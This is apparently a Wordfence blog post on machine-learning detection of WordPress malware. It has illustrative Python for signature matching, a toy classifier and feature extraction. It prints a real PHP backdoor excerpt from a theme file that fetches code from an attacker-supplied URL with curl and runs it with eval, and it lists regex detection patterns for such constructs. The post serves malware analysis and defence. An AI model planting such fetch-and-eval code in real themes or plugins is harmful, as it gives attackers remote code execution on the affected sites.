Wordfence Machine Learning Malware Identification

Machine Learning Gives Wordfence an Advantage

Wordfence is the leader in WordPress security, protecting over 4 million WordPress sites from malicious attacks. With new malware variants discovered daily, we now have a new weapon in our arsenal against WordPress attacks: Machine Learning.

How Wordfence identifies malware

For years, the Wordfence Threat Intelligence team has stayed ahead of attackers by quickly identifying new malware variants as they arise. In 2020 alone, our team identified 1,000,994 new malware files and rapidly deployed 957 malware signatures to detect them. These signatures identify and match patterns used by malware authors, alerting WordPress site owners when malware is found.
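
The signature matching described above can be sketched in a few lines of Python. This is a minimal illustration, not Wordfence's scanner: the signature names, the regular expressions, and the `scan` helper are all hypothetical and were made up for this example. It also shows why a small mutation in the code can slip past a pattern written for an earlier variant.

```python
import re

# Hypothetical signatures for illustration only; these are NOT real Wordfence signatures.
SIGNATURES = {
    "eval-of-decoded-payload": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE),
    "eval-of-request-input": re.compile(r"eval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE),
}


def scan(source: str) -> list[str]:
    """Return the names of all signatures that match the given file contents."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(source)]


# A variant the signatures were written for.
known_variant = "<?php eval(base64_decode($_POST['x'])); ?>"

# The same behavior, mutated so the function name never appears literally after eval(.
mutated_variant = "<?php $d = 'base64' . '_decode'; eval($d($_POST['x'])); ?>"

print(scan(known_variant))    # ['eval-of-decoded-payload']
print(scan(mutated_variant))  # []
```

The mutated variant does the same thing as the known one, yet neither pattern matches it, which is the kind of gap a human analyst would otherwise have to find and close by hand.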

While most new samples are similar to malware we have seen before, a few occasionally elude our signatures, usually through evasive mutations in code. These are often found by our site cleaning team during forensic investigations.

Human identification of previously undetected malware variants can be a tedious process. It requires testing and verification to ensure that our malware signatures accurately identify emerging malware without triggering false positives on valid code used on millions of WordPress websites.

In an effort to more rapidly identify new and emerging malware, the Wordfence Threat Intelligence team has implemented machine learning to complement our team’s efforts.

What is machine learning?

Machine learning is a class of computer algorithms that use training data to build a model that can recognize patterns in very large data sets. To apply machine learning effectively, it is important to have high-quality training data.

The Wordfence team has, quite possibly, the largest collection of WordPress-specific malware in the world. These malware samples have been carefully classified and curated, giving us an extremely high-quality set of training data for our machine learning algorithms.
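
To make the idea of "training data builds a model" concrete, here is a toy sketch in Python. The post does not say which algorithm Wordfence uses, so this example assumes a simple naive Bayes text classifier purely for illustration. The six training snippets, the labels, and the `NaiveBayes` class are invented for this example; a real system would train on a very large curated corpus.

```python
import math
import re
from collections import Counter

TOKEN = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def tokenize(source):
    """Split source code into lowercase identifier-like tokens."""
    return [t.lower() for t in TOKEN.findall(source)]


class NaiveBayes:
    """Toy multinomial naive Bayes with add-one smoothing (illustrative only)."""

    def __init__(self):
        self.token_counts = {"malicious": Counter(), "benign": Counter()}
        self.doc_counts = Counter()

    def train(self, source, label):
        self.doc_counts[label] += 1
        self.token_counts[label].update(tokenize(source))

    def predict(self, source):
        vocab = set(self.token_counts["malicious"]) | set(self.token_counts["benign"])
        total_docs = sum(self.doc_counts.values())
        scores = {}
        for label, counts in self.token_counts.items():
            total_tokens = sum(counts.values())
            # Start from the log prior, then add the log likelihood of each token.
            score = math.log(self.doc_counts[label] / total_docs)
            for tok in tokenize(source):
                score += math.log((counts[tok] + 1) / (total_tokens + len(vocab)))
            scores[label] = score
        return max(scores, key=scores.get)


# Made-up, hand-labeled training data standing in for a curated sample collection.
TRAINING = [
    ("eval(base64_decode($_POST['cmd']));", "malicious"),
    ("$out = curl_exec($ch); eval('?>' . $out);", "malicious"),
    ("assert(gzinflate(base64_decode($payload)));", "malicious"),
    ("echo esc_html(get_the_title());", "benign"),
    ("add_action('init', 'register_post_types');", "benign"),
    ("wp_enqueue_style('theme', get_stylesheet_uri());", "benign"),
]

model = NaiveBayes()
for source, label in TRAINING:
    model.train(source, label)

# Neither snippet appears verbatim in the training data.
print(model.predict("eval(gzinflate($_GET['x']));"))          # malicious
print(model.predict("echo esc_html(get_stylesheet_uri());"))  # benign
```

With only six examples the model is easily fooled, which is why the quality and size of the labeled collection matter far more than the choice of algorithm in a sketch like this.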

Machine learning powers a number of algorithms we experience daily. Content recommendations on Netflix, Spotify or YouTube, for example, are powered by machine learning. These algorithms train on the media consumption patterns of millions of users and predict what others may enjoy.

Using Machine Learning to Identify Emerging Malware

Malware is written for a wide variety of purposes, such as opening a backdoor, injecting spam, or redirecting visitors to malicious sites. WordPress-specific malware can be structured to hide itself in plain sight.

While malware can be found during scans, investigations, and maintenance, Wordfence’s work on machine learning has significantly shortened the time it takes to identify malware, such as the sample shown below.

Malware hidden in plain sight

error_reporting(0);
$ch = curl_init($_GET['url']);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
$output = curl_exec($ch);
eval ('?>'.$output);
$basepath = dirname(__FILE__);
 
function get_file($path) {
 
    if ( function_exists('realpath') )
        $path = realpath($path);
 
    if ( ! $path || ! @is_file($path) )
        return false;
 
    return @file_get_contents($path);
}

The sample above is an excerpt from what appears to be a theme file. Originally it may have been responsible for retrieving updates to theme files. But with this infection, it can also fetch a payload of malicious code, executing it on the infected site. This malware could be used to add malicious redirects, backdoors, spam files or spam links, or even to maintain persistent access to an infected site.

The malware attempts to ‘hide in plain sight’ by looking like ordinary code rather than relying on heavy obfuscation. It contacts a web address via curl and executes the code it returns, allowing fresh malware to be deployed by an attacker on demand.
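
The behavior described above (fetch remote content, then execute it) can be turned into numeric features that a model could learn from. The sketch below is an assumption about how such features might look, not a description of Wordfence's pipeline: the feature names, the regular expressions, and the `extract_features` helper are hypothetical, and `SAMPLE` is a shortened copy of the excerpt shown earlier.

```python
import re

# Hypothetical behavioral features, chosen for illustration only.
FEATURES = {
    "remote_fetch": r"\b(?:curl_exec|fsockopen)\s*\(",
    "dynamic_exec": r"\b(?:eval|assert|create_function)\s*\(",
    "request_input": r"\$_(?:GET|POST|REQUEST|COOKIE)\b",
    "tls_checks_disabled": r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:0|false)\b",
    "errors_silenced": r"\berror_reporting\s*\(\s*0\s*\)",
}


def extract_features(source):
    """Count how often each behavioral pattern occurs in the source text."""
    return {
        name: len(re.findall(pattern, source, re.IGNORECASE))
        for name, pattern in FEATURES.items()
    }


# Shortened copy of the PHP excerpt from the post.
SAMPLE = r"""
error_reporting(0);
$ch = curl_init($_GET['url']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$output = curl_exec($ch);
eval ('?>'.$output);
"""

features = extract_features(SAMPLE)
for name, count in features.items():
    print(f"{name}: {count}")
```

No single count here proves a file is malicious. The point of feeding such features to a trained model is that it can weigh combinations of them, for example a remote fetch from an attacker-supplied URL followed by dynamic execution, against what it has seen in known-good and known-bad code.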

Premium software often includes “upgrade” and “installer” component scripts that behave similarly. The malicious code, while suspicious, would not be out of place in many premium WordPress themes or plugins, which is what makes it harder to identify.

Because this is a new variant, it did not match our existing malware patterns. On manual inspection, a human analyst would quickly identify this as malware, but manually reviewing each new file is labor-intensive and does not scale well. Machine learning automates this process and allows us to identify emerging malware variants far faster than even a large team of human analysts could.

Machine learning effectively multiplies our ability to make initial assessments, locating suspicious code without requiring a specific pattern or heuristic. This frees up our analysts so that they can focus their energy on more important human intelligence tasks, like deciding between a Nespresso or Keurig coffee machine for those late night investigations.

Once our machine learning algorithms have identified emerging malware such as the sample above, a Wordfence analyst verifies the finding, creates a new firewall rule if needed, and creates a new malware signature to detect the malware, which is then released to our Premium Wordfence customers in real time.

Conclusion

Wordfence continues to evaluate new technologies. Back in 2015 we already had a custom-built cluster of GPU processors in production to help our customers choose more secure passwords. Not all our experiments make it to production, but machine learning has grown from a research project in our organization into a production technology that enables rapid identification of emerging malware threats.

We would like to give a special thanks to our Wordfence Premium customers, who make this kind of cutting-edge implementation possible. As malicious actors continue to target WordPress, Wordfence remains the leader in ensuring that the 4 million sites protected by Wordfence remain safe.

Special thanks to QA Engineer and Threat Analyst Ram Gall for his assistance with this blog post.

Comments

1 Comment
  • It is not easy for individuals to trace malicious attacks through machine learning but only experts such as WordFence can. However, thanks to the team at WordFence for making us aware of such things and hope you will continue doing good to the WordPress community.